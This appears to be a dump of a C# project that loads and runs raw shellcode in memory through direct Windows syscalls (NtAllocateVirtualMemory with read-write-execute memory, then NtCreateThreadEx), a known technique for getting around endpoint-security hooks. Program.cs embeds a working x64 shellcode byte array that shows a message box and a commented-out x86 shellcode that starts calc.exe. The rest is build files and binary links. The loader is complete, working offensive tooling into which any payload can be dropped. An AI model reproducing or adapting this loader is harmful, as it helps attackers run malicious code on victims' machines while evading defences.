211 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
212 | {
213 | throw new Win32Exception();
214 | }
215 |
216 | // Get delegate for NtWaitForSingleObject
217 | DelegatesStruct.NtWaitForSingleObject assembledFunction = (DelegatesStruct.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtWaitForSingleObject));
218 |
219 | return (uint)assembledFunction(Object, Alertable, Timeout);
220 | }
221 | }
222 | }
223 |
224 |
225 | public struct DelegatesStruct
226 | {
227 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
228 | public delegate uint NtAllocateVirtualMemory(
229 | IntPtr ProcessHandle,
230 | ref IntPtr BaseAddress,
231 | IntPtr ZeroBits,
232 | ref UIntPtr RegionSize,
233 | ulong AllocationType,
234 | ulong Protect);
235 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
236 | public delegate uint NtCreateThreadEx(
237 | out IntPtr hThread,
238 | uint DesiredAccess,
239 | IntPtr ObjectAttributes,
240 | IntPtr ProcessHandle,
241 | IntPtr lpStartAddress,
242 | IntPtr lpParameter,
243 | bool CreateSuspended,
244 | uint StackZeroBits,
245 | uint SizeOfStackCommit,
246 | uint SizeOfStackReserve,
247 | IntPtr lpBytesBuffer
248 | );
249 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
250 | public delegate uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout);
251 | }
252 |
253 |
254 | }
255 |
256 |
257 | }
258 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Runtime.InteropServices;
7 | using static SysCall_ShellcodeLoad.NativeCode;
8 |
9 | namespace SysCall_ShellcodeLoad
10 | {
11 | class Program
12 | {
13 | static void Main(string[] args)
14 | {
15 | /* Messagebox shellcode */
16 |
17 | byte[] buf1 = new byte[328] {
18 | 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00,
19 | 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
20 | 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
21 | 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a,
22 | 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02,
23 | 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52,
24 | 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
25 | 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0,
26 | 0x74, 0x6f, 0x48, 0x01, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
27 | 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
28 | 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
29 | 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75,
30 | 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6,
31 | 0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41,
32 | 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x3e,
33 | 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
34 | 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
35 | 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
36 | 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x00, 0x00, 0x00,
37 | 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x1a, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d,
38 | 0x85, 0x35, 0x01, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
39 | 0x56, 0x07, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6,
40 | 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
41 | 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
42 | 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x48, 0x65, 0x6C, 0x6C, 0x6F,
43 | 0x20, 0x77, 0x6F, 0x72, 0x6C, 0x64, 0x20, 0x76, 0x69, 0x61, 0x20, 0x73,
44 | 0x79, 0x73, 0x63, 0x61, 0x6C, 0x6C, 0x00, 0x41, 0x50, 0x49, 0x20, 0x54,
45 | 0x65, 0x73, 0x74, 0x00
46 | };
47 |
48 | /*
49 | byte[] buf1 = new byte[193] {
50 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
51 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
52 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
53 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
54 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
55 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
56 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
57 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
58 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
59 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
60 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
61 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
62 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00
63 | };
64 | */
65 |
66 | IntPtr pMemoryAllocation = IntPtr.Zero;
67 | IntPtr pZeroBits = IntPtr.Zero;
68 | UIntPtr pAllocationSize = new UIntPtr(Convert.ToUInt32(buf1.Length));
69 | uint MEM_COMMIT = 0x1000;
70 | uint MEM_RESERVE = 0x2000;
71 | uint PAGE_EXECUTE_READWRITE = 0x00000040;
72 |
73 | uint ntAllocResult = Auto_NativeCode.NtAllocateVirtualMemory(
74 | GetCurrentProcess(),
75 | ref pMemoryAllocation,
76 | pZeroBits,
77 | ref pAllocationSize,
78 | MEM_COMMIT | MEM_RESERVE,
79 | PAGE_EXECUTE_READWRITE
80 | );
81 |
82 |
83 | Console.WriteLine("AllocResult: " + ntAllocResult);
84 |
85 | Marshal.Copy(buf1, 0, (IntPtr)(pMemoryAllocation), buf1.Length);
86 |
87 | IntPtr hThread = IntPtr.Zero;
88 |
89 | uint STANDARD_RIGHTS_ALL = 0x001F0000;
90 | uint SPECIFIC_RIGHTS_ALL = 0x0000FFFF;
91 |
92 | uint hThreadResult = Auto_NativeCode.NtCreateThreadEx(
93 | out hThread,
94 | STANDARD_RIGHTS_ALL | SPECIFIC_RIGHTS_ALL,
95 | IntPtr.Zero,
96 | GetCurrentProcess(),
97 | pMemoryAllocation,
98 | IntPtr.Zero,
99 | false,
100 | 0,
101 | 0xFFFF,
102 | 0xFFFF,
103 | IntPtr.Zero
104 | );
105 |
106 | Console.WriteLine("hThreadResult: " + hThreadResult);
107 | uint result = Auto_NativeCode.NtWaitForSingleObject(hThread, true, 0);
108 |
109 | // Auto_NativeCode.GetSyscallID("NtAllocateVirtualMemory");
110 | return;
111 | }
112 | }
113 | }
114 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 有关程序集的一般信息由以下
6 | // 控制。更改这些特性值可修改
7 | // 与程序集关联的信息。
8 | [assembly: AssemblyTitle("SysCall_ShellcodeLoad")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SysCall_ShellcodeLoad")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("a9dec923-e66d-46d5-84ee-6d4733ff44ce")]
24 |
25 | // 程序集的版本信息由下列四个值组成:
26 | //
27 | // 主版本
28 | // 次版本
29 | // 生成号
30 | // 修订号
31 | //
32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*",如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/SysCall_ShellcodeLoad.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}
8 | Exe
9 | SysCall_ShellcodeLoad
10 | SysCall_ShellcodeLoad
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | true
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | true
36 |
37 |
38 | true
39 | bin\x64\Debug\
40 | DEBUG;TRACE
41 | true
42 | full
43 | x64
44 | 7.3
45 | prompt
46 | true
47 |
48 |
49 | bin\x64\Release\
50 | TRACE
51 | true
52 | true
53 | pdbonly
54 | x64
55 | 7.3
56 | prompt
57 | true
58 |
59 |
60 | true
61 | bin\x86\Debug\
62 | DEBUG;TRACE
63 | true
64 | full
65 | x86
66 | 7.3
67 | prompt
68 | true
69 |
70 |
71 | bin\x86\Release\
72 | TRACE
73 | true
74 | true
75 | pdbonly
76 | x86
77 | 7.3
78 | prompt
79 | true
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
5 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 1f63402e3013b79f2110ed506a2056a94be577d2
2 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.exe.config
2 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.exe
3 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.pdb
4 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache
5 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
6 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.exe
7 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.pdb
8 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
5 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8f7d3b6a18ccceae44f2b5f784143258a3709cea
2 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe.config
2 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe
3 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.pdb
4 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache
5 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
6 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.exe
7 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.pdb
8 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe.config
9 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe
10 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.pdb
11 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache
12 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
13 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.exe
14 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.pdb
15 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
5 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | bf7bf3ec09ad6ed738d5aa95fa9246d5c7e47f68
2 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.exe.config
2 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.exe
3 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.pdb
4 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache
5 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
6 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.exe
7 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.pdb
8 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.exe
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.pdb
--------------------------------------------------------------------------------